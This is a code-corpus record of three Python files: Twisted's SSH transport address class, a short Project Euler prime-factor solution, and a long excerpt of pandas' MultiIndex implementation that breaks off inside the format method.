aae53f91690d7960fdfa06cb9d005dc42e31a3a9
1,108
py
Python
twisted/conch/ssh/address.py
sxamit/twisted
30f6966329c857c3631c60aeb420d84d7828e01e
[ "MIT", "Unlicense" ]
1
2017-08-07T14:52:02.000Z
2017-08-07T14:52:02.000Z
Lib/site-packages/twisted/conch/ssh/address.py
adzhou/Python27
a7113b69d54a04cc780143241c2f1fe81939ad3a
[ "bzip2-1.0.6" ]
null
null
null
Lib/site-packages/twisted/conch/ssh/address.py
adzhou/Python27
a7113b69d54a04cc780143241c2f1fe81939ad3a
[ "bzip2-1.0.6" ]
1
2018-11-07T12:52:07.000Z
2018-11-07T12:52:07.000Z
# -*- test-case-name: twisted.conch.test.test_address -*- # Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ Address object for SSH network connections. Maintainer: Paul Swartz @since: 12.1 """ from zope.interface import implementer from twisted.internet.interfaces import IAddress from twisted.python import util @implementer(IAddress) class SSHTransportAddress(object, util.FancyEqMixin): """ Object representing an SSH Transport endpoint. This is used to ensure that any code inspecting this address and attempting to construct a similar connection based upon it is not mislead into creating a transport which is not similar to the one it is indicating. @ivar address: A instance of an object which implements I{IAddress} to which this transport address is connected. """ compareAttributes = ('address',) def __init__(self, address): self.address = address def __repr__(self): return 'SSHTransportAddress(%r)' % (self.address,) def __hash__(self): return hash(('SSH', self.address))
23.574468
75
0.714801
c1ded32814009c4305b6ef7c8e51b7e7ba989304
247
py
Python
000-025/p003/inle/inle_2.py
CDL-Project-Euler/Solutions
2a31ff286b9bbe7a9cd97539da5ce9091c1123d8
[ "MIT" ]
3
2020-05-09T17:48:49.000Z
2021-10-09T06:45:41.000Z
000-025/p003/inle/inle_2.py
CDL-Project-Euler/solutions
2a31ff286b9bbe7a9cd97539da5ce9091c1123d8
[ "MIT" ]
null
null
null
000-025/p003/inle/inle_2.py
CDL-Project-Euler/solutions
2a31ff286b9bbe7a9cd97539da5ce9091c1123d8
[ "MIT" ]
null
null
null
def largest_prime_factor(num, prev_max = 2): for pos_fact in range(prev_max, num): if num % pos_fact == 0: return largest_prime_factor(int(num / pos_fact), pos_fact) return num print(largest_prime_factor(600851475143))
35.285714
70
0.696356
0c158d47cfa3b98e76b6fbd8861f96500d300d02
134,381
py
Python
pandas/core/indexes/multi.py
rth/pandas
fd151ba5a873ecf6392897f722abfdfae915303e
[ "PSF-2.0", "Apache-2.0", "BSD-3-Clause-No-Nuclear-License-2014", "MIT", "ECL-2.0", "BSD-3-Clause" ]
1
2021-08-30T15:26:32.000Z
2021-08-30T15:26:32.000Z
pandas/core/indexes/multi.py
rth/pandas
fd151ba5a873ecf6392897f722abfdfae915303e
[ "PSF-2.0", "Apache-2.0", "BSD-3-Clause-No-Nuclear-License-2014", "MIT", "ECL-2.0", "BSD-3-Clause" ]
2
2021-09-05T22:23:43.000Z
2021-09-07T01:54:50.000Z
pandas/core/indexes/multi.py
rth/pandas
fd151ba5a873ecf6392897f722abfdfae915303e
[ "PSF-2.0", "Apache-2.0", "BSD-3-Clause-No-Nuclear-License-2014", "MIT", "ECL-2.0", "BSD-3-Clause" ]
null
null
null
from __future__ import annotations from functools import wraps from sys import getsizeof from typing import ( TYPE_CHECKING, Any, Callable, Collection, Hashable, Iterable, List, Sequence, Tuple, cast, ) import warnings import numpy as np from pandas._config import get_option from pandas._libs import ( algos as libalgos, index as libindex, lib, ) from pandas._libs.hashtable import duplicated from pandas._typing import ( AnyArrayLike, DtypeObj, Scalar, Shape, npt, ) from pandas.compat.numpy import function as nv from pandas.errors import ( InvalidIndexError, PerformanceWarning, UnsortedIndexError, ) from pandas.util._decorators import ( Appender, cache_readonly, deprecate_nonkeyword_arguments, doc, ) from pandas.core.dtypes.cast import coerce_indexer_dtype from pandas.core.dtypes.common import ( ensure_int64, ensure_platform_int, is_categorical_dtype, is_hashable, is_integer, is_iterator, is_list_like, is_object_dtype, is_scalar, pandas_dtype, ) from pandas.core.dtypes.dtypes import ExtensionDtype from pandas.core.dtypes.generic import ( ABCDataFrame, ABCDatetimeIndex, ABCTimedeltaIndex, ) from pandas.core.dtypes.missing import ( array_equivalent, isna, ) import pandas.core.algorithms as algos from pandas.core.arrays import Categorical from pandas.core.arrays.categorical import factorize_from_iterables import pandas.core.common as com import pandas.core.indexes.base as ibase from pandas.core.indexes.base import ( Index, _index_shared_docs, ensure_index, get_unanimous_names, ) from pandas.core.indexes.frozen import FrozenList from pandas.core.indexes.numeric import Int64Index from pandas.core.ops.invalid import make_invalid_op from pandas.core.sorting import ( get_group_index, indexer_from_factorized, lexsort_indexer, ) from pandas.io.formats.printing import pprint_thing if TYPE_CHECKING: from pandas import ( CategoricalIndex, DataFrame, Series, ) _index_doc_kwargs = dict(ibase._index_doc_kwargs) _index_doc_kwargs.update( {"klass": "MultiIndex", "target_klass": "MultiIndex or list of tuples"} ) class MultiIndexUIntEngine(libindex.BaseMultiIndexCodesEngine, libindex.UInt64Engine): """ This class manages a MultiIndex by mapping label combinations to positive integers. """ _base = libindex.UInt64Engine def _codes_to_ints(self, codes): """ Transform combination(s) of uint64 in one uint64 (each), in a strictly monotonic way (i.e. respecting the lexicographic order of integer combinations): see BaseMultiIndexCodesEngine documentation. Parameters ---------- codes : 1- or 2-dimensional array of dtype uint64 Combinations of integers (one per row) Returns ------- scalar or 1-dimensional array, of dtype uint64 Integer(s) representing one combination (each). """ # Shift the representation of each level by the pre-calculated number # of bits: codes <<= self.offsets # Now sum and OR are in fact interchangeable. This is a simple # composition of the (disjunct) significant bits of each level (i.e. # each column in "codes") in a single positive integer: if codes.ndim == 1: # Single key return np.bitwise_or.reduce(codes) # Multiple keys return np.bitwise_or.reduce(codes, axis=1) class MultiIndexPyIntEngine(libindex.BaseMultiIndexCodesEngine, libindex.ObjectEngine): """ This class manages those (extreme) cases in which the number of possible label combinations overflows the 64 bits integers, and uses an ObjectEngine containing Python integers. """ _base = libindex.ObjectEngine def _codes_to_ints(self, codes): """ Transform combination(s) of uint64 in one Python integer (each), in a strictly monotonic way (i.e. respecting the lexicographic order of integer combinations): see BaseMultiIndexCodesEngine documentation. Parameters ---------- codes : 1- or 2-dimensional array of dtype uint64 Combinations of integers (one per row) Returns ------- int, or 1-dimensional array of dtype object Integer(s) representing one combination (each). """ # Shift the representation of each level by the pre-calculated number # of bits. Since this can overflow uint64, first make sure we are # working with Python integers: codes = codes.astype("object") << self.offsets # Now sum and OR are in fact interchangeable. This is a simple # composition of the (disjunct) significant bits of each level (i.e. # each column in "codes") in a single positive integer (per row): if codes.ndim == 1: # Single key return np.bitwise_or.reduce(codes) # Multiple keys return np.bitwise_or.reduce(codes, axis=1) def names_compat(meth): """ A decorator to allow either `name` or `names` keyword but not both. This makes it easier to share code with base class. """ @wraps(meth) def new_meth(self_or_cls, *args, **kwargs): if "name" in kwargs and "names" in kwargs: raise TypeError("Can only provide one of `names` and `name`") elif "name" in kwargs: kwargs["names"] = kwargs.pop("name") return meth(self_or_cls, *args, **kwargs) return new_meth class MultiIndex(Index): """ A multi-level, or hierarchical, index object for pandas objects. Parameters ---------- levels : sequence of arrays The unique labels for each level. codes : sequence of arrays Integers for each level designating which label at each location. sortorder : optional int Level of sortedness (must be lexicographically sorted by that level). names : optional sequence of objects Names for each of the index levels. (name is accepted for compat). copy : bool, default False Copy the meta-data. verify_integrity : bool, default True Check that the levels/codes are consistent and valid. Attributes ---------- names levels codes nlevels levshape Methods ------- from_arrays from_tuples from_product from_frame set_levels set_codes to_frame to_flat_index sortlevel droplevel swaplevel reorder_levels remove_unused_levels get_locs See Also -------- MultiIndex.from_arrays : Convert list of arrays to MultiIndex. MultiIndex.from_product : Create a MultiIndex from the cartesian product of iterables. MultiIndex.from_tuples : Convert list of tuples to a MultiIndex. MultiIndex.from_frame : Make a MultiIndex from a DataFrame. Index : The base pandas Index type. Notes ----- See the `user guide <https://pandas.pydata.org/pandas-docs/stable/user_guide/advanced.html>`__ for more. Examples -------- A new ``MultiIndex`` is typically constructed using one of the helper methods :meth:`MultiIndex.from_arrays`, :meth:`MultiIndex.from_product` and :meth:`MultiIndex.from_tuples`. For example (using ``.from_arrays``): >>> arrays = [[1, 1, 2, 2], ['red', 'blue', 'red', 'blue']] >>> pd.MultiIndex.from_arrays(arrays, names=('number', 'color')) MultiIndex([(1, 'red'), (1, 'blue'), (2, 'red'), (2, 'blue')], names=['number', 'color']) See further examples for how to construct a MultiIndex in the doc strings of the mentioned helper methods. """ _hidden_attrs = Index._hidden_attrs | frozenset() # initialize to zero-length tuples to make everything work _typ = "multiindex" _names = FrozenList() _levels = FrozenList() _codes = FrozenList() _comparables = ["names"] sortorder: int | None # -------------------------------------------------------------------- # Constructors def __new__( cls, levels=None, codes=None, sortorder=None, names=None, dtype=None, copy=False, name=None, verify_integrity: bool = True, ): # compat with Index if name is not None: names = name if levels is None or codes is None: raise TypeError("Must pass both levels and codes") if len(levels) != len(codes): raise ValueError("Length of levels and codes must be the same.") if len(levels) == 0: raise ValueError("Must pass non-zero number of levels/codes") result = object.__new__(cls) result._cache = {} # we've already validated levels and codes, so shortcut here result._set_levels(levels, copy=copy, validate=False) result._set_codes(codes, copy=copy, validate=False) result._names = [None] * len(levels) if names is not None: # handles name validation result._set_names(names) if sortorder is not None: result.sortorder = int(sortorder) else: result.sortorder = sortorder if verify_integrity: new_codes = result._verify_integrity() result._codes = new_codes result._reset_identity() return result def _validate_codes(self, level: list, code: list): """ Reassign code values as -1 if their corresponding levels are NaN. Parameters ---------- code : list Code to reassign. level : list Level to check for missing values (NaN, NaT, None). Returns ------- new code where code value = -1 if it corresponds to a level with missing values (NaN, NaT, None). """ null_mask = isna(level) if np.any(null_mask): code = np.where(null_mask[code], -1, code) return code def _verify_integrity(self, codes: list | None = None, levels: list | None = None): """ Parameters ---------- codes : optional list Codes to check for validity. Defaults to current codes. levels : optional list Levels to check for validity. Defaults to current levels. Raises ------ ValueError If length of levels and codes don't match, if the codes for any level would exceed level bounds, or there are any duplicate levels. Returns ------- new codes where code value = -1 if it corresponds to a NaN level. """ # NOTE: Currently does not check, among other things, that cached # nlevels matches nor that sortorder matches actually sortorder. codes = codes or self.codes levels = levels or self.levels if len(levels) != len(codes): raise ValueError( "Length of levels and codes must match. NOTE: " "this index is in an inconsistent state." ) codes_length = len(codes[0]) for i, (level, level_codes) in enumerate(zip(levels, codes)): if len(level_codes) != codes_length: raise ValueError( f"Unequal code lengths: {[len(code_) for code_ in codes]}" ) if len(level_codes) and level_codes.max() >= len(level): raise ValueError( f"On level {i}, code max ({level_codes.max()}) >= length of " f"level ({len(level)}). NOTE: this index is in an " "inconsistent state" ) if len(level_codes) and level_codes.min() < -1: raise ValueError(f"On level {i}, code value ({level_codes.min()}) < -1") if not level.is_unique: raise ValueError( f"Level values must be unique: {list(level)} on level {i}" ) if self.sortorder is not None: if self.sortorder > _lexsort_depth(self.codes, self.nlevels): raise ValueError( "Value for sortorder must be inferior or equal to actual " f"lexsort_depth: sortorder {self.sortorder} " f"with lexsort_depth {_lexsort_depth(self.codes, self.nlevels)}" ) codes = [ self._validate_codes(level, code) for level, code in zip(levels, codes) ] new_codes = FrozenList(codes) return new_codes @classmethod def from_arrays(cls, arrays, sortorder=None, names=lib.no_default) -> MultiIndex: """ Convert arrays to MultiIndex. Parameters ---------- arrays : list / sequence of array-likes Each array-like gives one level's value for each data point. len(arrays) is the number of levels. sortorder : int or None Level of sortedness (must be lexicographically sorted by that level). names : list / sequence of str, optional Names for the levels in the index. Returns ------- MultiIndex See Also -------- MultiIndex.from_tuples : Convert list of tuples to MultiIndex. MultiIndex.from_product : Make a MultiIndex from cartesian product of iterables. MultiIndex.from_frame : Make a MultiIndex from a DataFrame. Examples -------- >>> arrays = [[1, 1, 2, 2], ['red', 'blue', 'red', 'blue']] >>> pd.MultiIndex.from_arrays(arrays, names=('number', 'color')) MultiIndex([(1, 'red'), (1, 'blue'), (2, 'red'), (2, 'blue')], names=['number', 'color']) """ error_msg = "Input must be a list / sequence of array-likes." if not is_list_like(arrays): raise TypeError(error_msg) elif is_iterator(arrays): arrays = list(arrays) # Check if elements of array are list-like for array in arrays: if not is_list_like(array): raise TypeError(error_msg) # Check if lengths of all arrays are equal or not, # raise ValueError, if not for i in range(1, len(arrays)): if len(arrays[i]) != len(arrays[i - 1]): raise ValueError("all arrays must be same length") codes, levels = factorize_from_iterables(arrays) if names is lib.no_default: names = [getattr(arr, "name", None) for arr in arrays] return cls( levels=levels, codes=codes, sortorder=sortorder, names=names, verify_integrity=False, ) @classmethod @names_compat def from_tuples( cls, tuples: Iterable[tuple[Hashable, ...]], sortorder: int | None = None, names: Sequence[Hashable] | None = None, ) -> MultiIndex: """ Convert list of tuples to MultiIndex. Parameters ---------- tuples : list / sequence of tuple-likes Each tuple is the index of one row/column. sortorder : int or None Level of sortedness (must be lexicographically sorted by that level). names : list / sequence of str, optional Names for the levels in the index. Returns ------- MultiIndex See Also -------- MultiIndex.from_arrays : Convert list of arrays to MultiIndex. MultiIndex.from_product : Make a MultiIndex from cartesian product of iterables. MultiIndex.from_frame : Make a MultiIndex from a DataFrame. Examples -------- >>> tuples = [(1, 'red'), (1, 'blue'), ... (2, 'red'), (2, 'blue')] >>> pd.MultiIndex.from_tuples(tuples, names=('number', 'color')) MultiIndex([(1, 'red'), (1, 'blue'), (2, 'red'), (2, 'blue')], names=['number', 'color']) """ if not is_list_like(tuples): raise TypeError("Input must be a list / sequence of tuple-likes.") elif is_iterator(tuples): tuples = list(tuples) tuples = cast(Collection[Tuple[Hashable, ...]], tuples) arrays: list[Sequence[Hashable]] if len(tuples) == 0: if names is None: raise TypeError("Cannot infer number of levels from empty list") arrays = [[]] * len(names) elif isinstance(tuples, (np.ndarray, Index)): if isinstance(tuples, Index): tuples = np.asarray(tuples._values) arrays = list(lib.tuples_to_object_array(tuples).T) elif isinstance(tuples, list): arrays = list(lib.to_object_array_tuples(tuples).T) else: arrs = zip(*tuples) arrays = cast(List[Sequence[Hashable]], arrs) return cls.from_arrays(arrays, sortorder=sortorder, names=names) @classmethod def from_product( cls, iterables, sortorder=None, names=lib.no_default ) -> MultiIndex: """ Make a MultiIndex from the cartesian product of multiple iterables. Parameters ---------- iterables : list / sequence of iterables Each iterable has unique labels for each level of the index. sortorder : int or None Level of sortedness (must be lexicographically sorted by that level). names : list / sequence of str, optional Names for the levels in the index. .. versionchanged:: 1.0.0 If not explicitly provided, names will be inferred from the elements of iterables if an element has a name attribute Returns ------- MultiIndex See Also -------- MultiIndex.from_arrays : Convert list of arrays to MultiIndex. MultiIndex.from_tuples : Convert list of tuples to MultiIndex. MultiIndex.from_frame : Make a MultiIndex from a DataFrame. Examples -------- >>> numbers = [0, 1, 2] >>> colors = ['green', 'purple'] >>> pd.MultiIndex.from_product([numbers, colors], ... names=['number', 'color']) MultiIndex([(0, 'green'), (0, 'purple'), (1, 'green'), (1, 'purple'), (2, 'green'), (2, 'purple')], names=['number', 'color']) """ from pandas.core.reshape.util import cartesian_product if not is_list_like(iterables): raise TypeError("Input must be a list / sequence of iterables.") elif is_iterator(iterables): iterables = list(iterables) codes, levels = factorize_from_iterables(iterables) if names is lib.no_default: names = [getattr(it, "name", None) for it in iterables] # codes are all ndarrays, so cartesian_product is lossless codes = cartesian_product(codes) return cls(levels, codes, sortorder=sortorder, names=names) @classmethod def from_frame(cls, df: DataFrame, sortorder=None, names=None) -> MultiIndex: """ Make a MultiIndex from a DataFrame. Parameters ---------- df : DataFrame DataFrame to be converted to MultiIndex. sortorder : int, optional Level of sortedness (must be lexicographically sorted by that level). names : list-like, optional If no names are provided, use the column names, or tuple of column names if the columns is a MultiIndex. If a sequence, overwrite names with the given sequence. Returns ------- MultiIndex The MultiIndex representation of the given DataFrame. See Also -------- MultiIndex.from_arrays : Convert list of arrays to MultiIndex. MultiIndex.from_tuples : Convert list of tuples to MultiIndex. MultiIndex.from_product : Make a MultiIndex from cartesian product of iterables. Examples -------- >>> df = pd.DataFrame([['HI', 'Temp'], ['HI', 'Precip'], ... ['NJ', 'Temp'], ['NJ', 'Precip']], ... columns=['a', 'b']) >>> df a b 0 HI Temp 1 HI Precip 2 NJ Temp 3 NJ Precip >>> pd.MultiIndex.from_frame(df) MultiIndex([('HI', 'Temp'), ('HI', 'Precip'), ('NJ', 'Temp'), ('NJ', 'Precip')], names=['a', 'b']) Using explicit names, instead of the column names >>> pd.MultiIndex.from_frame(df, names=['state', 'observation']) MultiIndex([('HI', 'Temp'), ('HI', 'Precip'), ('NJ', 'Temp'), ('NJ', 'Precip')], names=['state', 'observation']) """ if not isinstance(df, ABCDataFrame): raise TypeError("Input must be a DataFrame") column_names, columns = zip(*df.items()) names = column_names if names is None else names return cls.from_arrays(columns, sortorder=sortorder, names=names) # -------------------------------------------------------------------- @cache_readonly def _values(self) -> np.ndarray: # We override here, since our parent uses _data, which we don't use. values = [] for i in range(self.nlevels): vals = self._get_level_values(i) if is_categorical_dtype(vals.dtype): vals = cast("CategoricalIndex", vals) vals = vals._data._internal_get_values() if isinstance(vals.dtype, ExtensionDtype) or isinstance( vals, (ABCDatetimeIndex, ABCTimedeltaIndex) ): vals = vals.astype(object) # error: Incompatible types in assignment (expression has type "ndarray", # variable has type "Index") vals = np.array(vals, copy=False) # type: ignore[assignment] values.append(vals) arr = lib.fast_zip(values) return arr @property def values(self) -> np.ndarray: return self._values @property def array(self): """ Raises a ValueError for `MultiIndex` because there's no single array backing a MultiIndex. Raises ------ ValueError """ raise ValueError( "MultiIndex has no single backing array. Use " "'MultiIndex.to_numpy()' to get a NumPy array of tuples." ) @cache_readonly def dtypes(self) -> Series: """ Return the dtypes as a Series for the underlying MultiIndex """ from pandas import Series return Series( { f"level_{idx}" if level.name is None else level.name: level.dtype for idx, level in enumerate(self.levels) } ) def __len__(self) -> int: return len(self.codes[0]) # -------------------------------------------------------------------- # Levels Methods @cache_readonly def levels(self) -> FrozenList: # Use cache_readonly to ensure that self.get_locs doesn't repeatedly # create new IndexEngine # https://github.com/pandas-dev/pandas/issues/31648 result = [x._rename(name=name) for x, name in zip(self._levels, self._names)] for level in result: # disallow midx.levels[0].name = "foo" level._no_setting_name = True return FrozenList(result) def _set_levels( self, levels, *, level=None, copy: bool = False, validate: bool = True, verify_integrity: bool = False, ) -> None: # This is NOT part of the levels property because it should be # externally not allowed to set levels. User beware if you change # _levels directly if validate: if len(levels) == 0: raise ValueError("Must set non-zero number of levels.") if level is None and len(levels) != self.nlevels: raise ValueError("Length of levels must match number of levels.") if level is not None and len(levels) != len(level): raise ValueError("Length of levels must match length of level.") if level is None: new_levels = FrozenList( ensure_index(lev, copy=copy)._view() for lev in levels ) else: level_numbers = [self._get_level_number(lev) for lev in level] new_levels_list = list(self._levels) for lev_num, lev in zip(level_numbers, levels): new_levels_list[lev_num] = ensure_index(lev, copy=copy)._view() new_levels = FrozenList(new_levels_list) if verify_integrity: new_codes = self._verify_integrity(levels=new_levels) self._codes = new_codes names = self.names self._levels = new_levels if any(names): self._set_names(names) self._reset_cache() @deprecate_nonkeyword_arguments(version=None, allowed_args=["self", "levels"]) def set_levels( self, levels, level=None, inplace=None, verify_integrity: bool = True ): """ Set new levels on MultiIndex. Defaults to returning new index. Parameters ---------- levels : sequence or list of sequence New level(s) to apply. level : int, level name, or sequence of int/level names (default None) Level(s) to set (None for all levels). inplace : bool If True, mutates in place. .. deprecated:: 1.2.0 verify_integrity : bool, default True If True, checks that levels and codes are compatible. Returns ------- new index (of same type and class...etc) or None The same type as the caller or None if ``inplace=True``. Examples -------- >>> idx = pd.MultiIndex.from_tuples( ... [ ... (1, "one"), ... (1, "two"), ... (2, "one"), ... (2, "two"), ... (3, "one"), ... (3, "two") ... ], ... names=["foo", "bar"] ... ) >>> idx MultiIndex([(1, 'one'), (1, 'two'), (2, 'one'), (2, 'two'), (3, 'one'), (3, 'two')], names=['foo', 'bar']) >>> idx.set_levels([['a', 'b', 'c'], [1, 2]]) MultiIndex([('a', 1), ('a', 2), ('b', 1), ('b', 2), ('c', 1), ('c', 2)], names=['foo', 'bar']) >>> idx.set_levels(['a', 'b', 'c'], level=0) MultiIndex([('a', 'one'), ('a', 'two'), ('b', 'one'), ('b', 'two'), ('c', 'one'), ('c', 'two')], names=['foo', 'bar']) >>> idx.set_levels(['a', 'b'], level='bar') MultiIndex([(1, 'a'), (1, 'b'), (2, 'a'), (2, 'b'), (3, 'a'), (3, 'b')], names=['foo', 'bar']) If any of the levels passed to ``set_levels()`` exceeds the existing length, all of the values from that argument will be stored in the MultiIndex levels, though the values will be truncated in the MultiIndex output. >>> idx.set_levels([['a', 'b', 'c'], [1, 2, 3, 4]], level=[0, 1]) MultiIndex([('a', 1), ('a', 2), ('b', 1), ('b', 2), ('c', 1), ('c', 2)], names=['foo', 'bar']) >>> idx.set_levels([['a', 'b', 'c'], [1, 2, 3, 4]], level=[0, 1]).levels FrozenList([['a', 'b', 'c'], [1, 2, 3, 4]]) """ if inplace is not None: warnings.warn( "inplace is deprecated and will be removed in a future version.", FutureWarning, stacklevel=3, ) else: inplace = False if is_list_like(levels) and not isinstance(levels, Index): levels = list(levels) level, levels = _require_listlike(level, levels, "Levels") if inplace: idx = self else: idx = self._view() idx._reset_identity() idx._set_levels( levels, level=level, validate=True, verify_integrity=verify_integrity ) if not inplace: return idx @property def nlevels(self) -> int: """ Integer number of levels in this MultiIndex. Examples -------- >>> mi = pd.MultiIndex.from_arrays([['a'], ['b'], ['c']]) >>> mi MultiIndex([('a', 'b', 'c')], ) >>> mi.nlevels 3 """ return len(self._levels) @property def levshape(self) -> Shape: """ A tuple with the length of each level. Examples -------- >>> mi = pd.MultiIndex.from_arrays([['a'], ['b'], ['c']]) >>> mi MultiIndex([('a', 'b', 'c')], ) >>> mi.levshape (1, 1, 1) """ return tuple(len(x) for x in self.levels) # -------------------------------------------------------------------- # Codes Methods @property def codes(self): return self._codes def _set_codes( self, codes, *, level=None, copy: bool = False, validate: bool = True, verify_integrity: bool = False, ) -> None: if validate: if level is None and len(codes) != self.nlevels: raise ValueError("Length of codes must match number of levels") if level is not None and len(codes) != len(level): raise ValueError("Length of codes must match length of levels.") if level is None: new_codes = FrozenList( _coerce_indexer_frozen(level_codes, lev, copy=copy).view() for lev, level_codes in zip(self._levels, codes) ) else: level_numbers = [self._get_level_number(lev) for lev in level] new_codes_list = list(self._codes) for lev_num, level_codes in zip(level_numbers, codes): lev = self.levels[lev_num] new_codes_list[lev_num] = _coerce_indexer_frozen( level_codes, lev, copy=copy ) new_codes = FrozenList(new_codes_list) if verify_integrity: new_codes = self._verify_integrity(codes=new_codes) self._codes = new_codes self._reset_cache() @deprecate_nonkeyword_arguments(version=None, allowed_args=["self", "codes"]) def set_codes(self, codes, level=None, inplace=None, verify_integrity: bool = True): """ Set new codes on MultiIndex. Defaults to returning new index. Parameters ---------- codes : sequence or list of sequence New codes to apply. level : int, level name, or sequence of int/level names (default None) Level(s) to set (None for all levels). inplace : bool If True, mutates in place. .. deprecated:: 1.2.0 verify_integrity : bool, default True If True, checks that levels and codes are compatible. Returns ------- new index (of same type and class...etc) or None The same type as the caller or None if ``inplace=True``. Examples -------- >>> idx = pd.MultiIndex.from_tuples( ... [(1, "one"), (1, "two"), (2, "one"), (2, "two")], names=["foo", "bar"] ... ) >>> idx MultiIndex([(1, 'one'), (1, 'two'), (2, 'one'), (2, 'two')], names=['foo', 'bar']) >>> idx.set_codes([[1, 0, 1, 0], [0, 0, 1, 1]]) MultiIndex([(2, 'one'), (1, 'one'), (2, 'two'), (1, 'two')], names=['foo', 'bar']) >>> idx.set_codes([1, 0, 1, 0], level=0) MultiIndex([(2, 'one'), (1, 'two'), (2, 'one'), (1, 'two')], names=['foo', 'bar']) >>> idx.set_codes([0, 0, 1, 1], level='bar') MultiIndex([(1, 'one'), (1, 'one'), (2, 'two'), (2, 'two')], names=['foo', 'bar']) >>> idx.set_codes([[1, 0, 1, 0], [0, 0, 1, 1]], level=[0, 1]) MultiIndex([(2, 'one'), (1, 'one'), (2, 'two'), (1, 'two')], names=['foo', 'bar']) """ if inplace is not None: warnings.warn( "inplace is deprecated and will be removed in a future version.", FutureWarning, stacklevel=3, ) else: inplace = False level, codes = _require_listlike(level, codes, "Codes") if inplace: idx = self else: idx = self._view() idx._reset_identity() idx._set_codes(codes, level=level, verify_integrity=verify_integrity) if not inplace: return idx # -------------------------------------------------------------------- # Index Internals @cache_readonly def _engine(self): # Calculate the number of bits needed to represent labels in each # level, as log2 of their sizes (including -1 for NaN): sizes = np.ceil(np.log2([len(level) + 1 for level in self.levels])) # Sum bit counts, starting from the _right_.... lev_bits = np.cumsum(sizes[::-1])[::-1] # ... in order to obtain offsets such that sorting the combination of # shifted codes (one for each level, resulting in a unique integer) is # equivalent to sorting lexicographically the codes themselves. Notice # that each level needs to be shifted by the number of bits needed to # represent the _previous_ ones: offsets = np.concatenate([lev_bits[1:], [0]]).astype("uint64") # Check the total number of bits needed for our representation: if lev_bits[0] > 64: # The levels would overflow a 64 bit uint - use Python integers: return MultiIndexPyIntEngine(self.levels, self.codes, offsets) return MultiIndexUIntEngine(self.levels, self.codes, offsets) @property def _constructor(self) -> Callable[..., MultiIndex]: return type(self).from_tuples @doc(Index._shallow_copy) def _shallow_copy(self, values: np.ndarray, name=lib.no_default) -> MultiIndex: names = name if name is not lib.no_default else self.names return type(self).from_tuples(values, sortorder=None, names=names) def _view(self) -> MultiIndex: result = type(self)( levels=self.levels, codes=self.codes, sortorder=self.sortorder, names=self.names, verify_integrity=False, ) result._cache = self._cache.copy() result._cache.pop("levels", None) # GH32669 return result # -------------------------------------------------------------------- def copy( self, names=None, dtype=None, levels=None, codes=None, deep=False, name=None, ): """ Make a copy of this object. Names, dtype, levels and codes can be passed and will be set on new copy. Parameters ---------- names : sequence, optional dtype : numpy dtype or pandas type, optional .. deprecated:: 1.2.0 levels : sequence, optional .. deprecated:: 1.2.0 codes : sequence, optional .. deprecated:: 1.2.0 deep : bool, default False name : Label Kept for compatibility with 1-dimensional Index. Should not be used. Returns ------- MultiIndex Notes ----- In most cases, there should be no functional difference from using ``deep``, but if ``deep`` is passed it will attempt to deepcopy. This could be potentially expensive on large MultiIndex objects. """ names = self._validate_names(name=name, names=names, deep=deep) if levels is not None: warnings.warn( "parameter levels is deprecated and will be removed in a future " "version. Use the set_levels method instead.", FutureWarning, stacklevel=2, ) if codes is not None: warnings.warn( "parameter codes is deprecated and will be removed in a future " "version. Use the set_codes method instead.", FutureWarning, stacklevel=2, ) if deep: from copy import deepcopy if levels is None: levels = deepcopy(self.levels) if codes is None: codes = deepcopy(self.codes) levels = levels if levels is not None else self.levels codes = codes if codes is not None else self.codes new_index = type(self)( levels=levels, codes=codes, sortorder=self.sortorder, names=names, verify_integrity=False, ) new_index._cache = self._cache.copy() new_index._cache.pop("levels", None) # GH32669 if dtype: warnings.warn( "parameter dtype is deprecated and will be removed in a future " "version. Use the astype method instead.", FutureWarning, stacklevel=2, ) new_index = new_index.astype(dtype) return new_index def __array__(self, dtype=None) -> np.ndarray: """the array interface, return my values""" return self.values def view(self, cls=None): """this is defined as a copy with the same identity""" result = self.copy() result._id = self._id return result @doc(Index.__contains__) def __contains__(self, key: Any) -> bool: hash(key) try: self.get_loc(key) return True except (LookupError, TypeError, ValueError): return False @cache_readonly def dtype(self) -> np.dtype: return np.dtype("O") def _is_memory_usage_qualified(self) -> bool: """return a boolean if we need a qualified .info display""" def f(level): return "mixed" in level or "string" in level or "unicode" in level return any(f(level) for level in self._inferred_type_levels) @doc(Index.memory_usage) def memory_usage(self, deep: bool = False) -> int: # we are overwriting our base class to avoid # computing .values here which could materialize # a tuple representation unnecessarily return self._nbytes(deep) @cache_readonly def nbytes(self) -> int: """return the number of bytes in the underlying data""" return self._nbytes(False) def _nbytes(self, deep: bool = False) -> int: """ return the number of bytes in the underlying data deeply introspect the level data if deep=True include the engine hashtable *this is in internal routine* """ # for implementations with no useful getsizeof (PyPy) objsize = 24 level_nbytes = sum(i.memory_usage(deep=deep) for i in self.levels) label_nbytes = sum(i.nbytes for i in self.codes) names_nbytes = sum(getsizeof(i, objsize) for i in self.names) result = level_nbytes + label_nbytes + names_nbytes # include our engine hashtable result += self._engine.sizeof(deep=deep) return result # -------------------------------------------------------------------- # Rendering Methods def _formatter_func(self, tup): """ Formats each item in tup according to its level's formatter function. """ formatter_funcs = [level._formatter_func for level in self.levels] return tuple(func(val) for func, val in zip(formatter_funcs, tup)) def _format_native_types(self, na_rep="nan", **kwargs): new_levels = [] new_codes = [] # go through the levels and format them for level, level_codes in zip(self.levels, self.codes): level_strs = level._format_native_types(na_rep=na_rep, **kwargs) # add nan values, if there are any mask = level_codes == -1 if mask.any(): nan_index = len(level_strs) # numpy 1.21 deprecated implicit string casting level_strs = level_strs.astype(str) level_strs = np.append(level_strs, na_rep) assert not level_codes.flags.writeable # i.e. copy is needed level_codes = level_codes.copy() # make writeable level_codes[mask] = nan_index new_levels.append(level_strs) new_codes.append(level_codes) if len(new_levels) == 1: # a single-level multi-index return Index(new_levels[0].take(new_codes[0]))._format_native_types() else: # reconstruct the multi-index mi = MultiIndex( levels=new_levels, codes=new_codes, names=self.names, sortorder=self.sortorder, verify_integrity=False, ) return mi._values def format( self, name: bool | None = None, formatter: Callable | None = None, na_rep: str | None = None, names: bool = False, space: int = 2, sparsify=None, adjoin: bool = True, ) -> list: if name is not None: names = name if len(self) == 0: return [] stringified_levels = [] for lev, level_codes in zip(self.levels, self.codes): na = na_rep if na_rep is not None else _get_na_rep(lev.dtype.type) if len(lev) > 0: formatted = lev.take(level_codes).format(formatter=formatter) # we have some NA mask = level_codes == -1 if mask.any(): formatted = np.array(formatted, dtype=object) formatted[mask] = na formatted = formatted.tolist() else: # weird all NA 